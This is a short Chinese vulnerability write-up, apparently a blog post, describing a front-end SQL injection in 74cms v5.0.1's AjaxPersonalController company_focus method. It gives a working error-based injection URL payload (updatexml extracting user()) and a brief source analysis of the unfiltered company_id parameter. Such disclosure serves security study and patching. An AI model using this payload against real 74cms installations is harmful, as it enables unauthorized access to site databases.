001-74cms v5.0.1 前台sql注入

# 74cms v5.0.1 前台sql注入

## 漏洞简介

74cms 5.0.1 前台AjaxPersonalController.class.php存在SQL注入

## 复现过程

**具体信息**

文件位置:`74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php`

方法:`function company_focus($company_id)`

是否需登录:需要

登录权限:普通用户即可

**Payload:**

`http://url/74cms/5.0.1/upload/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa%22) and updatexml(1,concat(0x7e,(select user())),0) — a`

![](/static/lingzu/images/15889202892931.png)

**源码分析:**

文件:`74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php`

company_focus 方法是参数化函数,$company_id参数是不经过I函数过滤的,所以只要where可以控制,那就可以注入

![](/static/lingzu/images/15889203066024.png)

跟踪add_focus(),发现SQL语句参数外部都可以控制,导致了注入漏洞

![](/static/lingzu/images/15889203159409.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容